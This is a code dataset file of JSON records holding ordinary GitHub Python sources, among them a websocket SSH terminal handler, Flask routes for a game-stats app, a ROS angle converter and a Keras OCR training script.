+{"seq_id":"24978313664","text":"from setuptools import setup, find_packages\nimport pathlib\n\n# The directory containing this file\nHERE = pathlib.Path(__file__).parent\n\n# The text of the README file\nREADME = (HERE / \"README.md\").read_text()\n\nsetup(\n name=\"amc-cropper\",\n version=\"0.0.5\",\n description=\"Crops AMC files to descired length based on provided fps, start, and end whole seconds. Works through command line.\",\n long_description_content_type=\"text/markdown\",\n long_description=README,\n packages=find_packages(include=[\"amccrop\",\"amccrop.*\"]),\n classifiers=[\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Topic :: Software Development :: Libraries\",\n ],\n url=\"https://github.com/UomoCaffeLatte/AMCCrop\",\n author=\"Nikhil Reji\",\n author_email=\"Nikhil.Reji@live.co.uk\",\n install_requires=[\"AsfAmc-Parser\"],\n entry_points={\n \"console_scripts\": [\n \"amccrop=amccrop.__main__:main\",\n ]\n },\n)","repo_name":"UomoCaffeLatte/AMCCrop","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16207794621","text":"def jump(nums) -> int:\n if len(nums) == 1:\n return 0\n new_list = list()\n for index in range(len(nums)):\n new_list.append(index+nums[index])\n total = 0\n start = 0\n end = len(nums)-1\n while start != end:\n for index in range(start, end+1):\n if new_list[index] >= end:\n total += 1\n end = index\n break\n return total\n\nprint(jump([2,3,1,1,4]))\nprint(jump([2,3,0,1,4]))\nprint(jump([2,1]))\nprint(jump([1,1,1,1]))","repo_name":"nvk681/Python-Practice","sub_path":"python/jump_game_2.py","file_name":"jump_game_2.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16775220537","text":"from tornado.websocket import WebSocketHandler\r\nfrom app import logger, config\r\nfrom .ssh import SSH\r\nimport threading\r\nfrom app.model.servers import Server\r\nimport os\r\nimport asyncio\r\n\r\n\r\nclass SshHandler(WebSocketHandler):\r\n\r\n def check_origin(self, origin):\r\n return True\r\n\r\n # def initialize(self, *args,**kwargs):\r\n # print('----')\r\n # print(args, kwargs)\r\n\r\n def _reading(self):\r\n asyncio.set_event_loop(asyncio.new_event_loop())\r\n while True:\r\n data = self.ssh.read()\r\n self.write_message(data)\r\n\r\n def open(self, *args, **kwargs):\r\n logger.info(\"Websocket 打开\")\r\n if args:\r\n server_id = int(args[0])\r\n server = Server.query.get(server_id)\r\n # if server.passwd:\r\n # self.ssh = SSH(server.host, server.port,\r\n # server.user, server.passwd)\r\n # elif server.perm:\r\n # keyfile = os.path.join(config.read(\"UPLOAD_PATH\"), server.perm)\r\n # self.ssh = SSH(server.ip, server.port,\r\n # server.user, keyfile=keyfile)\r\n if server.perm:\r\n keyfile = os.path.join(config.read(\"UPLOAD_PATH\"), server.perm)\r\n else:\r\n keyfile = None\r\n self.ssh = SSH(server.ip, server.port,\r\n server.user, server.passwd, keyfile, server.passcode)\r\n\r\n t = threading.Thread(target=self._reading)\r\n t.setDaemon(True)\r\n t.start()\r\n\r\n def on_message(self, message):\r\n if message.startswith(\"size\"):\r\n cols, rows = message.split(':')[1].split(',')\r\n self.ssh.resize(int(cols), int(rows))\r\n else:\r\n self.ssh.send(message)\r\n\r\n def on_close(self):\r\n print(\"WebSocket Closed\")\r\n","repo_name":"jellyfrank/flask_manager","sub_path":"app/ws/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"43021477754","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass BSTIterator:\n\n def __init__(self, root: TreeNode):\n if not root:\n self.g = iter(())\n self.has_next = False\n self.cache = None\n return\n \n def g(root):\n if root.left:\n yield from g(root.left)\n yield root.val\n if root.right:\n yield from g(root.right)\n \n self.g = g(root)\n self.has_next = None\n self.cache = None\n\n \n def next(self) -> int:\n \"\"\"\n @return the next smallest number\n \"\"\"\n if self.cache is not None:\n v = self.cache\n self.cache = None\n self.has_next = None\n else:\n v = next(self.g, None)\n return v\n \n\n def hasNext(self) -> bool:\n \"\"\"\n @return whether we have a next smallest number\n \"\"\"\n if self.has_next is None:\n self.cache = next(self.g, None)\n if self.cache is None:\n self.has_next = False\n else:\n self.has_next = True\n return self.has_next\n\n\n# Your BSTIterator object will be instantiated and called as such:\n# obj = BSTIterator(root)\n# param_1 = obj.next()\n# param_2 = obj.hasNext()","repo_name":"IvanaGyro/LeetCode-Answer","sub_path":"0173_20190426_015042.py","file_name":"0173_20190426_015042.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10868077231","text":"import os\nimport pandas as pd\nimport sys\nfrom processing import process_volume, measure\n\nif __name__ == \"__main__\":\n base_path = os.path.abspath(__file__ + \"/..\")\n\n expansion_factors = pd.read_csv(base_path + \"/data/expansion_factors.csv\")\n expansion_factors_dict = {}\n\n input_batch = sys.argv[1:]\n\n for input_folder in input_batch:\n if not os.path.isdir(input_folder):\n raise Exception(input_folder + \" is not a directory. Inputs must be a folder of files.\")\n \n row = expansion_factors[expansion_factors[\"id\"] == os.path.basename(input_folder)[4:-4]]\n expansion_factor = row[\"expansion_factor\"].values[0]\n\n if not expansion_factor:\n raise Exception(input_folder + \" does not have an expansion factor.\")\n \n expansion_factors_dict[input_folder] = expansion_factor\n \n assert len(input_batch) == len(expansion_factors_dict), \"Collisions when creating expansion_factor dictionary (i.e. one to many relationship).\"\n\n print(f\"Number of volumes: {len(expansion_factors_dict)}\")\n\n save_file = base_path + \"/data/segmentation_data.csv\"\n\n with open(save_file, \"w\") as f:\n f.write(\"id,image_volume (um3),axon_volume (um3),axon_length (um),avg_axon_radius (um)\\n\")\n\n for input_folder, expansion_factor in expansion_factors_dict.items():\n name = os.path.basename(input_folder)\n print(f\"Processing {name}\")\n\n vol = process_volume(input_folder)\n data = measure(vol, expansion_factor)\n \n with open(save_file, \"a\") as f:\n f.write(f\"{name},{data[0]},{data[1]},{data[2]},{data[3]}\\n\")","repo_name":"kamodulin/expansion-microscopy","sub_path":"process_batch.py","file_name":"process_batch.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15440310725","text":"import json\nfrom time import time\nfrom os import remove\nfrom os.path import exists\n\nfrom mhooge_flask.logging import logger\nimport flask\n\nimport api.util as api_util\nimport app.util as app_util\nfrom api.awards import get_intfar_reasons, get_doinks_reasons\nfrom api.game_data import get_stat_quantity_descriptions\nfrom discbot.commands.util import ADMIN_DISC_ID\n\nstart_page = flask.Blueprint(\"index\", __name__, template_folder=\"templates\")\n\ndef format_duration_approx(timestamp):\n time_now = time()\n duration = time_now - timestamp\n if duration < 60:\n metric = \"sec\"\n elif duration < 60 * 60:\n metric = \"min\"\n duration = duration / 60\n elif duration < 60 * 60 * 24:\n metric = \"hour\"\n duration = duration / (60 * 60)\n elif duration < 60 * 60 * 24 * 30:\n metric = \"day\"\n duration = duration / (60 * 60 * 24)\n else:\n metric = \"month\"\n duration = duration / (60 * 60 * 24 * 30)\n\n duration = int(duration)\n if duration > 1:\n metric = metric + \"s\"\n\n return f\"{duration} {metric} ago\"\n\ndef get_intfar_desc(game, game_data):\n _, _, disc_id, _, intfar_id, intfar_str = game_data\n intfar_reasons = get_intfar_reasons(game).values()\n response_list = None\n\n if disc_id == intfar_id:\n name = app_util.discord_request(\"func\", \"get_discord_nick\", disc_id)\n response_list = [\n (\"name\", name), (\"regular\", \"got\"),\n (\"feed-award\", \"Int-Far\"), (\"regular\", \"for\")\n ]\n count = 0\n for reason, char in zip(intfar_reasons, intfar_str):\n if char == \"1\":\n if count != 0:\n response_list.append((\"regular\", \"and\"))\n response_list.append((\"bold\", reason))\n count += 1\n\n return response_list\n\ndef get_doinks_desc(game, game_data):\n _, _, disc_id, doinks_str, _, _ = game_data\n doinks_reasons = get_doinks_reasons(game).values()\n response_list = None\n\n if doinks_str is not None:\n name = app_util.discord_request(\"func\", \"get_discord_nick\", disc_id)\n response_list = [\n (\"name\", name), (\"regular\", \"got\"),\n (\"feed-award\", \"Big Doinks\"), (\"regular\", \"for\")\n ]\n count = 0\n for reason, char in zip(doinks_reasons, doinks_str):\n if char == \"1\":\n if count != 0:\n response_list.append((\"regular\", \"and\"))\n response_list.append((\"bold\", reason))\n count += 1\n\n return response_list\n\ndef get_stat_desc(game, game_data, best_stats, worst_stats):\n game_id, _, disc_id, _, _, _ = game_data\n responses = []\n stats = get_stat_quantity_descriptions(game)\n for i, stat_list in enumerate((best_stats, worst_stats)):\n for stat, person_id, stat_value, stat_game_id in stat_list:\n if stat_game_id == game_id and person_id == disc_id: # Best/worst stat was beaten.\n stat_fmt = api_util.round_digits(stat_value)\n stat_name_fmt = stat.replace(\"_\", \" \")\n readable_stat = stats[stat][i] + \" \" + stat_name_fmt\n name = app_util.discord_request(\"func\", \"get_discord_nick\", disc_id)\n response_list = [\n (\"name\", name), (\"regular\", \"got the\"), (\"feed-award\", readable_stat),\n (\"regular\", \"ever with\"), (\"bold\", f\"{stat_fmt} {stat_name_fmt}\")\n ]\n responses.append(response_list)\n return responses\n\ndef get_game_desc(game, game_data, best_stats, worst_stats):\n duration = format_duration_approx(game_data[1])\n return (\n get_intfar_desc(game, game_data),\n get_doinks_desc(game, game_data),\n get_stat_desc(game, game_data, best_stats, worst_stats),\n duration\n )\n\ndef get_bet_desc(game, bet_data):\n betting_handler = flask.current_app.config[\"BET_HANDLERS\"][game]\n disc_id, _, guild_id, timestamp, amounts, events, targets, _, result, payout = bet_data\n disc_data = app_util.discord_request(\"func\", [\"get_discord_nick\", \"get_guild_name\"], [disc_id, guild_id])\n name = disc_data[0]\n guild = disc_data[1]\n result_desc = \"Won\" if result == 1 else \"Lost\"\n tokens = (\n api_util.format_tokens_amount(payout) if result == 1\n else api_util.format_tokens_amount(sum(amounts))\n )\n response_list = [\n (\"name\", name), (\"regular\", result_desc), (\"bold\", f\"{tokens} GBP\"),\n (\"regular\", \"in\"), (\"bold\", guild), (\"regular\", \"by betting on\")\n ]\n for i, (event, target) in enumerate(zip(events, targets)):\n target_name = (None if target is None\n else app_util.discord_request(\"func\", \"get_discord_nick\", target))\n dynamic_desc = betting_handler.get_dynamic_bet_desc(event, target_name)\n if i != 0:\n response_list.append((\"regular\", \" and \"))\n response_list.append((\"bold\", dynamic_desc))\n\n return response_list, format_duration_approx(timestamp)\n\ndef get_feed_data(game, database, feed_length=10):\n bets = database.get_bets(game, False)\n\n all_bets = []\n for disc_id in bets:\n for bet_data in bets[disc_id]:\n all_bets.append((disc_id,) + bet_data)\n\n all_bets.sort(key=lambda x: x[3])\n\n all_game_data = database.get_recent_intfars_and_doinks(game)\n best_stats_ever = []\n worst_stats_ever = []\n\n stats = get_stat_quantity_descriptions(game)\n\n for best in (True, False):\n for stat in stats:\n maximize = not ((stat != \"deaths\") ^ best)\n stat_id, stat_value, game_id = database.get_most_extreme_stat(game, stat, maximize)\n if best:\n best_stats_ever.append((stat, stat_id, stat_value, game_id))\n else:\n worst_stats_ever.append((stat, stat_id, stat_value, game_id))\n\n feed_data = []\n bets_index = len(all_bets) - 1\n games_index = len(all_game_data) - 1\n\n while len(feed_data) < feed_length:\n game_data = all_game_data[games_index]\n bet_data = all_bets[bets_index]\n game_timestamp = game_data[1]\n bet_timestamp = bet_data[3]\n if game_timestamp > bet_timestamp:\n intfar_desc, doinks_desc, stat_descs, duration = get_game_desc(\n game_data, best_stats_ever, worst_stats_ever\n )\n if intfar_desc is not None:\n feed_data.append((intfar_desc, duration))\n if doinks_desc is not None:\n feed_data.append((doinks_desc, duration))\n for stat_desc in stat_descs:\n feed_data.append((stat_desc, duration))\n\n games_index -= 1\n else:\n bet_desc, duration = get_bet_desc(game, bet_data)\n if bet_desc is not None:\n feed_data.append((bet_desc, duration))\n bets_index -= 1\n\n return feed_data\n\n@start_page.route(\"/\")\n@start_page.route(\"/index\")\ndef index():\n game = flask.current_app.config[\"CURRENT_GAME\"]\n database = flask.current_app.config[\"DATABASE\"]\n curr_month = api_util.current_month()\n\n feed_descs = get_feed_data(game, database, feed_length=25)\n\n intfar_all_data = []\n intfar_month_data = []\n for disc_id in database.users[game]:\n games_played, intfar_reason_ids = database.get_intfar_stats(game, disc_id)\n games_played_monthly, intfar_reason_ids_monthly = database.get_intfar_stats(game, disc_id, True)\n pct_intfar = (\n 0 if games_played == 0\n else len(intfar_reason_ids) / games_played * 100\n )\n pct_intfar_monthly = (\n 0 if games_played_monthly == 0\n else len(intfar_reason_ids_monthly) / games_played_monthly * 100\n )\n\n intfar_all_data.append(\n (disc_id, games_played, len(intfar_reason_ids), f\"{pct_intfar:.2f}\")\n )\n intfar_month_data.append(\n (disc_id, games_played_monthly, len(intfar_reason_ids_monthly), f\"{pct_intfar_monthly:.2f}\")\n )\n\n avatars = app_util.discord_request(\"func\", \"get_discord_avatar\", None)\n if avatars:\n avatars = [\n flask.url_for(\"static\", filename=avatar.replace(\"app/static/\", \"\"))\n for avatar in avatars\n ]\n nicknames = app_util.discord_request(\"func\", \"get_discord_nick\", None)\n\n intfar_all_data = [\n (x,) + y + (z,)\n for (x, y, z) in zip(nicknames, intfar_all_data, avatars)\n ]\n intfar_month_data = [\n (x,) + y + (z,)\n for (x, y, z) in zip(nicknames, intfar_month_data, avatars)\n ]\n\n intfar_all_data.sort(key=lambda x: (x[3], x[4]), reverse=True)\n intfar_month_data.sort(key=lambda x: (x[3], x[4]), reverse=True)\n\n return app_util.make_template_context(\n \"index.html\",\n game=game,\n curr_month=curr_month,\n feed_descs=feed_descs,\n intfar_all=intfar_all_data,\n intfar_month=intfar_month_data\n )\n\n@start_page.route(\"active_game\", methods=[\"GET\"])\ndef get_active_game_info():\n game = flask.current_app.config[\"CURRENT_GAME\"]\n logged_in_user = app_util.get_user_details()[0]\n\n if logged_in_user is None:\n return app_util.make_json_response(\"Error: You need to be verified to access this data.\", 401)\n\n json_response = app_util.get_game_info(game)\n\n shown_games = app_util.filter_hidden_games(json_response, logged_in_user)\n\n if shown_games == []:\n return app_util.make_json_response(\"No active game\", 404)\n\n return app_util.make_json_response(shown_games, 200)\n\n@start_page.route(\"game_started\", methods=[\"POST\"])\ndef active_game_started():\n game = flask.current_app.config[\"CURRENT_GAME\"]\n data = flask.request.form\n conf = flask.current_app.config[\"APP_CONFIG\"]\n\n secret = data.get(\"secret\")\n\n # Verify that the request contains the Discord App Token (that is only known by us).\n if secret != conf.discord_token:\n return flask.make_response((\"Error: Unauthorized access.\", 401))\n\n saved_data = dict(data)\n del saved_data[\"secret\"]\n saved_data[\"start\"] = float(saved_data[\"start\"])\n saved_data[\"map_id\"] = int(saved_data[\"map_id\"])\n saved_data[\"guild_id\"] = int(saved_data[\"guild_id\"])\n\n flask.current_app.config[\"ACTIVE_GAME\"][saved_data[\"guild_id\"]][game] = saved_data\n return flask.make_response((\"Success! Active game ID updated.\", 200))\n\n@start_page.route(\"game_ended\", methods=[\"POST\"])\ndef active_game_ended():\n game = flask.current_app.config[\"CURRENT_GAME\"]\n data = flask.request.form\n conf = flask.current_app.config[\"APP_CONFIG\"]\n\n secret = data.get(\"secret\")\n\n # Verify that the request contains the Discord App Token (that is only known by us).\n if secret != conf.discord_token:\n return flask.make_response((\"Error: Unauthorized access.\", 401))\n\n flask.current_app.config[\"ACTIVE_GAME\"][int(data[\"guild_id\"])][game] = None\n\n if flask.current_app.config[\"GAME_PREDICTION\"].get(int(data[\"game_id\"])) is not None:\n remove(\"resources/predictions_temp.json\")\n\n flask.current_app.config[\"GAME_PREDICTION\"][int(data[\"game_id\"])] = None\n\n return flask.make_response((\"Success! Active game ID deleted.\", 200))\n\n@start_page.route(\"/heartbeat\")\ndef heartbeat():\n if flask.current_app.config[\"EXIT_CODE\"] != 0:\n return app_util.make_text_response(\"Restarting\", 503)\n\n return app_util.make_text_response(\"Alive and kicking!\", 200)\n\n@start_page.route(\"/restart\", methods=[\"POST\"])\ndef restart():\n logged_in_user = app_util.get_user_details()[0]\n\n if logged_in_user is None or logged_in_user != ADMIN_DISC_ID:\n return app_util.make_text_response(\"Unathorized Access.\", 401)\n\n flask.current_app.config[\"EXIT_CODE\"] = 2\n\n exit(2)\n\ndef save_prediction_to_file(prediction, game_duration):\n filename = \"resources/predictions_temp.json\"\n if exists(filename):\n snapshot_json = json.load(open(filename, \"r\", encoding=\"utf-8\"))\n else:\n snapshot_json = {\"predictions\": []}\n\n snapshot_json[\"predictions\"].append({\n \"timestamp\": game_duration,\n \"prediction\": prediction\n })\n\n json.dump(snapshot_json, open(filename, \"w\", encoding=\"utf-8\"), indent=4)\n\n@start_page.route(\"/update_prediction\", methods=[\"POST\"])\ndef set_prediction():\n data = flask.request.form\n conf = flask.current_app.config[\"APP_CONFIG\"]\n\n secret = data.get(\"secret\")\n\n # Verify that the request contains the Discord App Token (that is only known by us).\n if secret != conf.discord_token:\n return flask.make_response((\"Error: Unauthorized access.\", 401))\n\n game_id = int(data[\"game_id\"])\n\n logger.info(f\"Updated game prediction: {data['pct_win']}% chance of winning.\")\n\n save_prediction_to_file(data[\"pct_win\"], int(data[\"game_duration\"]))\n\n flask.current_app.config[\"GAME_PREDICTION\"][game_id] = data[\"pct_win\"]\n\n return flask.make_response((\"Success! Game prediction updated.\", 200))\n\n@start_page.route(\"/prediction\", methods=[\"GET\"])\ndef get_prediction():\n data = flask.request.args\n game_id = data.get(\"game_id\")\n\n if game_id is None:\n return app_util.make_json_response(\"Error: Missing parameter 'game_id'.\", 400)\n\n pct_win = flask.current_app.config[\"GAME_PREDICTION\"].get(int(game_id))\n\n if pct_win is None:\n return app_util.make_json_response(\"Error: No prediction exists.\", 404)\n\n return app_util.make_json_response(pct_win, 200)\n","repo_name":"mhso/IntFar","sub_path":"app/routes/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":13372,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5739264190","text":"#!/usr/bin/env python3\nimport rospy\nfrom arduinobot_controller.srv import AnglesConverter, AnglesConverterResponse\nimport math\n\n\"\"\"\nFunction call back for radians_to_degrees service. This function receives the position for the\narm in radians and converts them to degrees.\n\"\"\"\ndef convert_radians_to_degrees(req):\n res = AnglesConverterResponse()\n res.base = int(((req.base+(math.pi/2))*180)/math.pi)\n res.shoulder = 180-int(((req.shoulder+(math.pi/2))*180)/math.pi)\n res.elbow = int(((req.elbow+(math.pi/2))*180)/math.pi)\n res.gripper = int(((-req.gripper)*180)/(math.pi/2))\n\n return res\n\n\"\"\"\nFunction call back for degrees_to_radians service. This function receives the position for the\narm in degrees and converts them to radians.\n\"\"\"\ndef convert_degrees_to_radians(req):\n res = AnglesConverterResponse()\n res.base = ((math.pi*req.base) - ((math.pi/2)*180))/180\n res.shoulder = (((180-req.shoulder)*math.pi)-((math.pi/2)*180))/180\n res.elbow = ((math.pi*req.elbow) - ((math.pi/2)*180))/180\n res.gripper = -((math.pi/2)*req.gripper)/180\n\n return res\n\nif __name__ == '__main__':\n # Initialize a ROS node names angles_converter\n rospy.init_node(\"angles_converter\")\n\n # Initialize a service to convert radians to degrees and vice versa\n radians_to_degress = rospy.Service(\"radians_to_degress\", AnglesConverter, convert_radians_to_degrees)\n degrees_to_radians = rospy.Service(\"degress_to_radians\", AnglesConverter, convert_degrees_to_radians)\n \n # keeps the node up and running\n rospy.spin()\n\n","repo_name":"dmagill89/arduinobot","sub_path":"src/arduinobot_controller/scripts/angles_converter.py","file_name":"angles_converter.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9322726093","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 30 01:27:41 2020\n\n@author: GaborSarosi\n\"\"\"\n\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, Flatten, Dropout, BatchNormalization, MaxPool2D\nfrom keras.utils import to_categorical\nimport pandas as pd\nimport numpy as np\nfrom helper import Gimatrias as gm\nfrom datetime import datetime\nimport os\nfrom keras.optimizers import RMSprop\nfrom keras.callbacks import ReduceLROnPlateau\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\n\ntrain_df = pd.read_csv(f'dataset/train/train_flat_gim.csv', header=None)\ntest_df = pd.read_csv(f'dataset/test/test_flat_gim.csv', header=None)\n\ntrain_labels = train_df.loc[:,0].values\ntrain_images = train_df.loc[:,1:576].values\n\ntest_labels = test_df.loc[:,0].values\ntest_images = test_df.loc[:,1:576].values\n\ntrain_images = np.expand_dims(train_images, axis=0)\ntest_images = np.expand_dims(test_images, axis=0)\n\ntrain_size = train_labels.size\n\ntrain_images = train_images.reshape(train_labels.size, 24, 24, 1)\ntest_images = test_images.reshape(test_labels.size, 24, 24, 1)\n\ntrain_labels = to_categorical(train_labels)\ntest_labels = to_categorical(test_labels)\n\n#needed only because test data does not have paspas, so it is only 1002 long\n#TODO: add paspas to test_data!!!!! and then remove this line\ntest_labels = np.hstack((test_labels, np.zeros((test_labels.shape[0], 1), dtype=test_labels.dtype)))\n\nset_image_dim_ordering=\"th\"\n\n#<><><><> MODEL <><><><>\n\nmodel = keras.Sequential()\n#model.add(keras.layers.InputLayer(()))\n#model.add(Conv2D(64, kernel_size=3, activation='relu', input_shape=(24,24,1)))\n#model.add(Conv2D(64, kernel_size=3, activation='relu'))\n#model.add(MaxPooling2D(pool_size=(2, 2)))\n#model.add(Conv2D(128, kernel_size=3, activation='relu'))\n#model.add(Conv2D(128, kernel_size=3, activation='relu'))\n#model.add(MaxPooling2D(pool_size=(2, 2)))\n#model.add(Dropout(0.25))\n#model.add(Flatten())\n#model.add(Dense(256, activation='relu'))\n#model.add(Dropout(0.5))\n#model.add(Dense(1003, activation=\"softmax\"))\n\n\nmodel.add(Conv2D(filters=32, kernel_size=(5,5), padding='Same', activation='relu', input_shape=(24,24,1)))\nmodel.add(BatchNormalization())\nmodel.add(Conv2D(filters=32, kernel_size=(5,5), padding='Same', activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(MaxPool2D(pool_size=(2,2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(filters=64, kernel_size=(3,3), padding='Same', activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Conv2D(filters=64, kernel_size=(3,3), padding='Same', activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(MaxPool2D(pool_size=(2,2), strides=(2,2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dense(256, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1003, activation='softmax'))\n\nepochs = 30\nbatch_size = 64\n\noptimizer = RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)\n\nmodel.compile(optimizer = optimizer , loss = \"categorical_crossentropy\", metrics=[\"accuracy\"])\n#model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\nlearning_rate_reduction = ReduceLROnPlateau(monitor='val_accuracy', \n patience=2, \n verbose=1, \n factor=0.5, \n min_lr=0.00001)\n\nmodel.summary()\n\nimage_gen=ImageDataGenerator(rotation_range=10,width_shift_range=0.1,height_shift_range=0.1,shear_range=0.1,zoom_range=0.1,horizontal_flip=False,vertical_flip=False,fill_mode='nearest')\n\nmodel.fit_generator(image_gen.flow(train_images, train_labels, batch_size=batch_size), epochs=epochs, validation_data = (test_images, test_labels), callbacks = [learning_rate_reduction])\n\n\n#model.fit(train_images, train_labels, epochs=30)\n\n#<><><><> TEST SET <><><><>\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n\nprint('\\nTest loss:', test_loss)\nprint('Test accuracy:', test_acc, '\\n')\n\n#<><><><> PREDICTIONS <><><><>\nprobability_model = keras.Sequential([model, keras.layers.Softmax()])\n\npredictions = probability_model.predict(test_images)\n\nnow = datetime.now()\ndt_string = now.strftime(\"%Y-%m-%d-%H-%M-%S\")\n\n\n#<><><><> FINDING THE WRONG PREDICTIONS <><><><> \ndef evaluate_mistakes(save_to_csv: False, print_to_screen: True):\n# #if save_to_csv:\n# csvfile = csv.writer(open('evaluate/test_mistakes'+dt_string+'.csv', 'w', newline=''))\n# fieldnames = ['Reality', 'Prediction']\n# writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n# csvfile.writeheader()\n print(\"\\n ---- WRONG PREDICTIONS ---- \")\n num_mistakes = 0 \n for idx, pred in enumerate(predictions):\n label_at_idx = np.argmax(test_labels[idx])\n if not np.argmax(predictions[idx]) == label_at_idx:\n test_example = gm.full_name_of(label_at_idx)\n predicted = gm.full_name_of(np.argmax(predictions[idx]))\n if print_to_screen:\n print(idx, 'test:', test_example, 'prediction:', predicted)\n# if save_to_csv:\n# row = [test_example, predicted]\n# csvfile.writerow(row)\n num_mistakes = num_mistakes+1\n print('Number of mistakes = ', num_mistakes, '\\n')\n\n#<><><><> SAVING THE MODEL <><><><>\ndef save_my_weights(num_mistakes):\n modelname = \"rashinet\" + str(num_mistakes) + \"_\" + dt_string\n os.chdir(\"models\")\n os.mkdir(modelname)\n os.chdir(modelname)\n \n model_yaml = model.to_yaml()\n with open(modelname+\".yaml\", \"w\") as yaml_file:\n yaml_file.write(model_yaml)\n \n model_json = model.to_json()\n with open(modelname+\".json\", \"w\") as json_file:\n json_file.write(model_json)\n \n h5name = modelname + '.h5'\n model.save_weights(h5name)\n \n \nevaluate_mistakes(True, True)\n#save_my_weights(num_mistakes)\n\ndef freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):\n \"\"\"\n Freezes the state of a session into a pruned computation graph.\n\n Creates a new computation graph where variable nodes are replaced by\n constants taking their current value in the session. The new graph will be\n pruned so subgraphs that are not necessary to compute the requested\n outputs are removed.\n @param session The TensorFlow session to be frozen.\n @param keep_var_names A list of variable names that should not be frozen,\n or None to freeze all the variables in the graph.\n @param output_names Names of the relevant graph outputs.\n @param clear_devices Remove the device directives from the graph for better portability.\n @return The frozen graph definition.\n \"\"\"\n graph = session.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = \"\"\n frozen_graph = tf.graph_util.convert_variables_to_constants(\n session, input_graph_def, output_names, freeze_var_names)\n return frozen_graph\n","repo_name":"sarosi/RashiOCR","sub_path":"nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":7471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8206696205","text":"from flask_restx import Api, Resource, reqparse, Namespace\nfrom flask import request\n\nfrom classes import Stream\nfrom classes import apikey\nfrom classes import topics\nfrom classes import settings\nfrom classes import upvotes\nfrom classes.shared import db\n\nfrom functions import cachedDbCalls\n\napi = Namespace(\"stream\", description=\"Stream Related Queries and Functions\")\n\nstreamParserPut = reqparse.RequestParser()\nstreamParserPut.add_argument(\"streamName\", type=str)\nstreamParserPut.add_argument(\"topicID\", type=int)\n\nstreamSearchPost = reqparse.RequestParser()\nstreamSearchPost.add_argument(\"term\", type=str)\n\n\n@api.route(\"/\")\nclass api_1_ListStreams(Resource):\n def get(self):\n \"\"\"\n Returns a List of All Active Streams\n \"\"\"\n results = []\n sysSettings = cachedDbCalls.getSystemSettings()\n\n streamList = (\n Stream.Stream.query.filter_by(active=True)\n .with_entities(\n Stream.Stream.id,\n Stream.Stream.uuid,\n Stream.Stream.startTimestamp,\n Stream.Stream.linkedChannel,\n Stream.Stream.streamName,\n Stream.Stream.topic,\n Stream.Stream.currentViewers,\n Stream.Stream.active,\n Stream.Stream.rtmpServer,\n )\n .all()\n )\n for stream in streamList:\n channelQuery = cachedDbCalls.getChannel(stream.linkedChannel)\n if channelQuery.private != True:\n rtmpQuery = settings.rtmpServer.query.filter_by(\n id=stream.rtmpServer\n ).with_entities(\n settings.rtmpServer.id,\n settings.rtmpServer.active,\n settings.rtmpServer.address\n ).first()\n upvotesQueryCount = upvotes.streamUpvotes.query.filter_by(\n streamID=stream.id\n ).count()\n\n streamURL = \"\"\n if sysSettings.adaptiveStreaming is True:\n streamURL = \"/live-adapt/\" + channelQuery.channelLoc + \".m3u8\"\n else:\n streamURL = \"/live/\" + channelQuery.channelLoc + \"/index.m3u8\"\n\n entry = {\n \"id\": stream.id,\n \"uuid\": stream.uuid,\n \"startTimestamp\": str(stream.startTimestamp),\n \"channelID\": stream.linkedChannel,\n \"channelEndpointID\": channelQuery.channelLoc,\n \"owningUser\": channelQuery.owningUser,\n \"streamPage\": \"/view/\" + channelQuery.channelLoc + \"/\",\n \"streamURL\": streamURL,\n \"streamName\": stream.streamName,\n \"thumbnail\": \"/stream-thumb/\" + channelQuery.channelLoc + \".png\",\n \"gifLocation\": \"/stream-thumb/\" + channelQuery.channelLoc + \".gif\",\n \"topic\": stream.topic,\n \"rtmpServer\": rtmpQuery.address,\n \"currentViewers\": stream.currentViewers,\n \"totalViewers\": stream.currentViewers,\n \"active\": stream.active,\n \"upvotes\": upvotesQueryCount,\n }\n 